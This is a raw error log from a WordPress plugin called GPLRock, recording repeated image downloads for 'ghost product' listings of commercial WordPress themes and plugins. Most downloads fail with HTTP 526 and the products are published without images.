https://meldwp.com/wp-content/uploads/appone---app-landing-wordpress-theme-20723.webp [05-Apr-2026 15:44:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appone-app-landing-wordpress-theme [05-Apr-2026 15:44:27 UTC] GPLRock: Image download failed for product renovatio-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:29 UTC] GPLRock: Image download failed for product renovatio-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renovatio--interior-design-wordpress-theme-18461.webp for product renovatio-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:31 UTC] GPLRock: Image download failed for product renovatio-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:33 UTC] GPLRock: Image download failed for product renovatio-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/renovatio--interior-design-wordpress-theme-18461.webp for product renovatio-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:35 UTC] GPLRock WARNING: Image download failed for product renovatio-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/renovatio--interior-design-wordpress-theme-18461.webp [05-Apr-2026 15:44:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: renovatio-interior-design-wordpress-theme [05-Apr-2026 15:44:36 UTC] GPLRock: Image downloaded successfully for product brandex-one-page-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-65adca66.webp [05-Apr-2026 15:44:36 UTC] GPLRock: Using pre-downloaded image for product brandex-one-page-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-65adca66.webp [05-Apr-2026 15:44:36 UTC] GPLRock: Ghost product published with image - Product ID: brandex-one-page-portfolio-wordpress-theme [05-Apr-2026 15:44:36 UTC] GPLRock: Image download failed for product cozy-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:38 UTC] GPLRock: Image download failed for product cozy-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cozy---interior-design-wordpress-theme-6300.webp for product cozy-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:40 UTC] GPLRock: Image download failed for product cozy-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:42 UTC] GPLRock: Image download failed for product cozy-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cozy---interior-design-wordpress-theme-6300.webp for product cozy-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:44 UTC] GPLRock WARNING: Image download failed for product cozy-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cozy---interior-design-wordpress-theme-6300.webp [05-Apr-2026 15:44:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cozy-interior-design-wordpress-theme [05-Apr-2026 15:44:45 UTC] GPLRock: Image download failed for product coca-architecture (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:47 UTC] GPLRock: Image download failed for product coca-architecture (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coca---architecture-14074.webp for product coca-architecture after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:49 UTC] GPLRock: Image download failed for product coca-architecture (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:51 UTC] GPLRock: Image download failed for product coca-architecture (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coca---architecture-14074.webp for product coca-architecture after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:53 UTC] GPLRock WARNING: Image download failed for product coca-architecture. URL: https://meldwp.com/wp-content/uploads/coca---architecture-14074.webp [05-Apr-2026 15:44:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coca-architecture [05-Apr-2026 15:44:53 UTC] GPLRock: Image download failed for product sycho-psychology-and-counseling-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:55 UTC] GPLRock: Image download failed for product sycho-psychology-and-counseling-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:44:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sycho---psychology-and-counseling-wordpress-theme-25410.webp for product sycho-psychology-and-counseling-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:44:58 UTC] GPLRock: Image download failed for product sycho-psychology-and-counseling-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:00 UTC] GPLRock: Image download failed for product sycho-psychology-and-counseling-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sycho---psychology-and-counseling-wordpress-theme-25410.webp for product sycho-psychology-and-counseling-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:45:02 UTC] GPLRock WARNING: Image download failed for product sycho-psychology-and-counseling-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sycho---psychology-and-counseling-wordpress-theme-25410.webp [05-Apr-2026 15:45:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sycho-psychology-and-counseling-wordpress-theme [05-Apr-2026 15:45:02 UTC] GPLRock: Image download failed for product candlea-candle-handmade-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:04 UTC] GPLRock: Image download failed for product candlea-candle-handmade-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/candlea---candle-handmade-wordpress-theme-14512.webp for product candlea-candle-handmade-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:45:06 UTC] GPLRock: Image download failed for product candlea-candle-handmade-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:08 UTC] GPLRock: Image download failed for product candlea-candle-handmade-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/candlea---candle-handmade-wordpress-theme-14512.webp for product candlea-candle-handmade-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:45:10 UTC] GPLRock WARNING: Image download failed for product candlea-candle-handmade-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/candlea---candle-handmade-wordpress-theme-14512.webp [05-Apr-2026 15:45:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: candlea-candle-handmade-wordpress-theme [05-Apr-2026 15:45:11 UTC] GPLRock: Image download failed for product faryita-organic-juice-health-drinks-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:13 UTC] GPLRock: Image download failed for product faryita-organic-juice-health-drinks-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/faryita---organic-juice--health-drinks-wordpress-theme-12545.webp for product faryita-organic-juice-health-drinks-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:45:15 UTC] GPLRock: Image download failed for product faryita-organic-juice-health-drinks-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:17 UTC] GPLRock: Image download failed for product faryita-organic-juice-health-drinks-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:45:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/faryita---organic-juice--health-drinks-wordpress-theme-12545.webp for product faryita-organic-juice-health-drinks-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:45:19 UTC] GPLRock WARNING: Image download failed for product faryita-organic-juice-health-drinks-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/faryita---organic-juice--health-drinks-wordpress-theme-12545.webp [05-Apr-2026 15:45:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: faryita-organic-juice-health-drinks-wordpress-theme [05-Apr-2026 15:46:02 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-frequently-bought-together-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e956356.jpg [05-Apr-2026 15:46:02 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-frequently-bought-together-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e956356.jpg [05-Apr-2026 15:46:02 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-frequently-bought-together-premium [05-Apr-2026 15:46:04 UTC] GPLRock: Image downloaded successfully for product woocommerce-google-product-feed (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-76733887.jpg [05-Apr-2026 15:46:04 UTC] GPLRock: Using pre-downloaded image for product woocommerce-google-product-feed: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-76733887.jpg [05-Apr-2026 15:46:04 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-google-product-feed [05-Apr-2026 15:46:06 UTC] GPLRock: Image downloaded successfully for product master-popups-wordpress-popup-plugin-for-email-subscription (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3c5656a1.jpg [05-Apr-2026 15:46:06 UTC] GPLRock: Using pre-downloaded image for product master-popups-wordpress-popup-plugin-for-email-subscription: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3c5656a1.jpg [05-Apr-2026 15:46:06 UTC] GPLRock: Ghost product published with image - Product ID: master-popups-wordpress-popup-plugin-for-email-subscription [05-Apr-2026 15:46:08 UTC] GPLRock: Image downloaded successfully for product listify-wordpress-directory-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7bf6cc54.png [05-Apr-2026 15:46:08 UTC] GPLRock: Using pre-downloaded image for product listify-wordpress-directory-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7bf6cc54.png [05-Apr-2026 15:46:08 UTC] GPLRock: Ghost product published with image - Product ID: listify-wordpress-directory-theme [05-Apr-2026 15:46:10 UTC] GPLRock: Image downloaded successfully for product mainwp-piwik (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea54e21a.jpg [05-Apr-2026 15:46:10 UTC] GPLRock: Using pre-downloaded image for product mainwp-piwik: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ea54e21a.jpg [05-Apr-2026 15:46:10 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-piwik [05-Apr-2026 15:46:11 UTC] GPLRock: Image downloaded successfully for product mainwp-ithemes-security (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7bb96a5c.jpg [05-Apr-2026 15:46:11 UTC] GPLRock: Using pre-downloaded image for product mainwp-ithemes-security: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7bb96a5c.jpg [05-Apr-2026 15:46:11 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-ithemes-security [05-Apr-2026 15:46:12 UTC] GPLRock: Image downloaded successfully for product mainwp-favorites (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b292e7cc.jpg [05-Apr-2026 15:46:12 UTC] GPLRock: Using pre-downloaded image for product mainwp-favorites: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b292e7cc.jpg [05-Apr-2026 15:46:12 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-favorites [05-Apr-2026 15:46:14 UTC] GPLRock: Image downloaded successfully for product woocommerce-360-image (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11339b94.jpg [05-Apr-2026 15:46:14 UTC] GPLRock: Using pre-downloaded image for product woocommerce-360-image: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-11339b94.jpg [05-Apr-2026 15:46:14 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-360-image [05-Apr-2026 15:46:16 UTC] GPLRock: Image downloaded successfully for product woocommerce-floating-cart (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdbb9deb.jpg [05-Apr-2026 15:46:16 UTC] GPLRock: Using pre-downloaded image for product woocommerce-floating-cart: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdbb9deb.jpg [05-Apr-2026 15:46:16 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-floating-cart [05-Apr-2026 15:46:18 UTC] GPLRock: Image downloaded successfully for product boxshop-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf2d0c14.jpg [05-Apr-2026 15:46:18 UTC] GPLRock: Using pre-downloaded image for product boxshop-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bf2d0c14.jpg [05-Apr-2026 15:46:18 UTC] GPLRock: Ghost product published with image - Product ID: boxshop-responsive-woocommerce-wordpress-theme [05-Apr-2026 15:48:06 UTC] GPLRock: Image download failed for product skote-html-laravel-12-admin-dashboard-template-sketch (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:48:08 UTC] GPLRock: Image download failed for product skote-html-laravel-12-admin-dashboard-template-sketch (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:48:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/skote---html--laravel-12-admin-dashboard-template--sketch-29877.webp for product skote-html-laravel-12-admin-dashboard-template-sketch after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:48:10 UTC] GPLRock: Image download failed for product skote-html-laravel-12-admin-dashboard-template-sketch (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:48:12 UTC] GPLRock: Image download failed for product skote-html-laravel-12-admin-dashboard-template-sketch (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:48:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/skote---html--laravel-12-admin-dashboard-template--sketch-29877.webp for product skote-html-laravel-12-admin-dashboard-template-sketch after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:48:14 UTC] GPLRock WARNING: Image download failed for product skote-html-laravel-12-admin-dashboard-template-sketch. URL: https://meldwp.com/wp-content/uploads/skote---html--laravel-12-admin-dashboard-template--sketch-29877.webp [05-Apr-2026 15:48:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: skote-html-laravel-12-admin-dashboard-template-sketch [05-Apr-2026 15:48:14 UTC] GPLRock: Image download failed for product aqualine-car-washing-service-with-booking-system-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:48:16 UTC] GPLRock: Image download failed for product aqualine-car-washing-service-with-booking-system-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:48:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aqualine---car-washing-service-with-booking-system-wordpress-theme-24971.webp for product aqualine-car-washing-service-with-booking-system-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:48:19 UTC] GPLRock: Image download failed for product aqualine-car-washing-service-with-booking-system-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:27 UTC] GPLRock: Image download failed for product filter-everything-wordpresswoocommerce-product-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:29 UTC] GPLRock: Image download failed for product filter-everything-wordpresswoocommerce-product-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/filter-everything--wordpresswoocommerce-product-filter-18783.webp for product filter-everything-wordpresswoocommerce-product-filter after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:31 UTC] GPLRock: Image download failed for product filter-everything-wordpresswoocommerce-product-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:33 UTC] GPLRock: Image download failed for product filter-everything-wordpresswoocommerce-product-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/filter-everything--wordpresswoocommerce-product-filter-18783.webp for product filter-everything-wordpresswoocommerce-product-filter after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:35 UTC] GPLRock WARNING: Image download failed for product filter-everything-wordpresswoocommerce-product-filter. URL: https://meldwp.com/wp-content/uploads/filter-everything--wordpresswoocommerce-product-filter-18783.webp [05-Apr-2026 15:58:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: filter-everything-wordpresswoocommerce-product-filter [05-Apr-2026 15:58:35 UTC] GPLRock: Image download failed for product ultimate-meme-generator-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:37 UTC] GPLRock: Image download failed for product ultimate-meme-generator-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-meme-generator---wordpress-plugin-24623.webp for product ultimate-meme-generator-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:40 UTC] GPLRock: Image download failed for product ultimate-meme-generator-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:42 UTC] GPLRock: Image download failed for product ultimate-meme-generator-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-meme-generator---wordpress-plugin-24623.webp for product ultimate-meme-generator-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:44 UTC] GPLRock WARNING: Image download failed for product ultimate-meme-generator-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/ultimate-meme-generator---wordpress-plugin-24623.webp [05-Apr-2026 15:58:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-meme-generator-wordpress-plugin [05-Apr-2026 15:58:44 UTC] GPLRock: Image downloaded successfully for product tabbed-gallery-for-elementor-galerie (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7f41261.webp [05-Apr-2026 15:58:44 UTC] GPLRock: Using pre-downloaded image for product tabbed-gallery-for-elementor-galerie: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7f41261.webp [05-Apr-2026 15:58:44 UTC] GPLRock: Ghost product published with image - Product ID: tabbed-gallery-for-elementor-galerie [05-Apr-2026 15:58:44 UTC] GPLRock: Image download failed for product woocommerce-business-tools-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:46 UTC] GPLRock: Image download failed for product woocommerce-business-tools-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-business-tools-bundle-21901.webp for product woocommerce-business-tools-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:49 UTC] GPLRock: Image download failed for product woocommerce-business-tools-bundle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:51 UTC] GPLRock: Image download failed for product woocommerce-business-tools-bundle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-business-tools-bundle-21901.webp for product woocommerce-business-tools-bundle after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:53 UTC] GPLRock WARNING: Image download failed for product woocommerce-business-tools-bundle. URL: https://meldwp.com/wp-content/uploads/woocommerce-business-tools-bundle-21901.webp [05-Apr-2026 15:58:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-business-tools-bundle [05-Apr-2026 15:58:53 UTC] GPLRock: Image download failed for product visual-composer-background-wave-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:55 UTC] GPLRock: Image download failed for product visual-composer-background-wave-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:58:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---background-wave-effects-18841.webp for product visual-composer-background-wave-effects after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:58:57 UTC] GPLRock: Image download failed for product visual-composer-background-wave-effects (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:00 UTC] GPLRock: Image download failed for product visual-composer-background-wave-effects (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/visual-composer---background-wave-effects-18841.webp for product visual-composer-background-wave-effects after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:02 UTC] GPLRock WARNING: Image download failed for product visual-composer-background-wave-effects. URL: https://meldwp.com/wp-content/uploads/visual-composer---background-wave-effects-18841.webp [05-Apr-2026 15:59:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: visual-composer-background-wave-effects [05-Apr-2026 15:59:02 UTC] GPLRock: Image download failed for product data-table-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:04 UTC] GPLRock: Image download failed for product data-table-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/data-table-addon-for-elementor-21657.webp for product data-table-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:06 UTC] GPLRock: Image download failed for product data-table-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:09 UTC] GPLRock: Image download failed for product data-table-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/data-table-addon-for-elementor-21657.webp for product data-table-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:11 UTC] GPLRock WARNING: Image download failed for product data-table-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/data-table-addon-for-elementor-21657.webp [05-Apr-2026 15:59:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: data-table-addon-for-elementor [05-Apr-2026 15:59:11 UTC] GPLRock: Image download failed for product php-social-stream (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:13 UTC] GPLRock: Image download failed for product php-social-stream (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/php-social-stream-5940.webp for product php-social-stream after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:15 UTC] GPLRock: Image download failed for product php-social-stream (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:17 UTC] GPLRock: Image download failed for product php-social-stream (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/php-social-stream-5940.webp for product php-social-stream after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:19 UTC] GPLRock WARNING: Image download failed for product php-social-stream. URL: https://meldwp.com/wp-content/uploads/php-social-stream-5940.webp [05-Apr-2026 15:59:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: php-social-stream [05-Apr-2026 15:59:20 UTC] GPLRock: Image download failed for product enhancements-for-woocommerce-points-and-rewards (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:22 UTC] GPLRock: Image download failed for product enhancements-for-woocommerce-points-and-rewards (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enhancements-for-woocommerce-points-and-rewards-6338.webp for product enhancements-for-woocommerce-points-and-rewards after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:24 UTC] GPLRock: Image download failed for product enhancements-for-woocommerce-points-and-rewards (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:26 UTC] GPLRock: Image download failed for product enhancements-for-woocommerce-points-and-rewards (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enhancements-for-woocommerce-points-and-rewards-6338.webp for product enhancements-for-woocommerce-points-and-rewards after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:28 UTC] GPLRock WARNING: Image download failed for product enhancements-for-woocommerce-points-and-rewards. URL: https://meldwp.com/wp-content/uploads/enhancements-for-woocommerce-points-and-rewards-6338.webp [05-Apr-2026 15:59:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enhancements-for-woocommerce-points-and-rewards [05-Apr-2026 15:59:29 UTC] GPLRock: Image download failed for product carter-advanced-woocommerce-cart-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:31 UTC] GPLRock: Image download failed for product carter-advanced-woocommerce-cart-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carter--advanced-woocommerce-cart-for-elementor-33803.webp for product carter-advanced-woocommerce-cart-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:33 UTC] GPLRock: Image download failed for product carter-advanced-woocommerce-cart-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:35 UTC] GPLRock: Image download failed for product carter-advanced-woocommerce-cart-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carter--advanced-woocommerce-cart-for-elementor-33803.webp for product carter-advanced-woocommerce-cart-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:37 UTC] GPLRock WARNING: Image download failed for product carter-advanced-woocommerce-cart-for-elementor. URL: https://meldwp.com/wp-content/uploads/carter--advanced-woocommerce-cart-for-elementor-33803.webp [05-Apr-2026 15:59:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carter-advanced-woocommerce-cart-for-elementor [05-Apr-2026 15:59:37 UTC] GPLRock: Image download failed for product ninja-forms-unique-fields (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:39 UTC] GPLRock: Image download failed for product ninja-forms-unique-fields (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-forms---unique-fields-32925.webp for product ninja-forms-unique-fields after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:42 UTC] GPLRock: Image download failed for product ninja-forms-unique-fields (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:44 UTC] GPLRock: Image download failed for product ninja-forms-unique-fields (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 15:59:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninja-forms---unique-fields-32925.webp for product ninja-forms-unique-fields after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 15:59:46 UTC] GPLRock WARNING: Image download failed for product ninja-forms-unique-fields. URL: https://meldwp.com/wp-content/uploads/ninja-forms---unique-fields-32925.webp 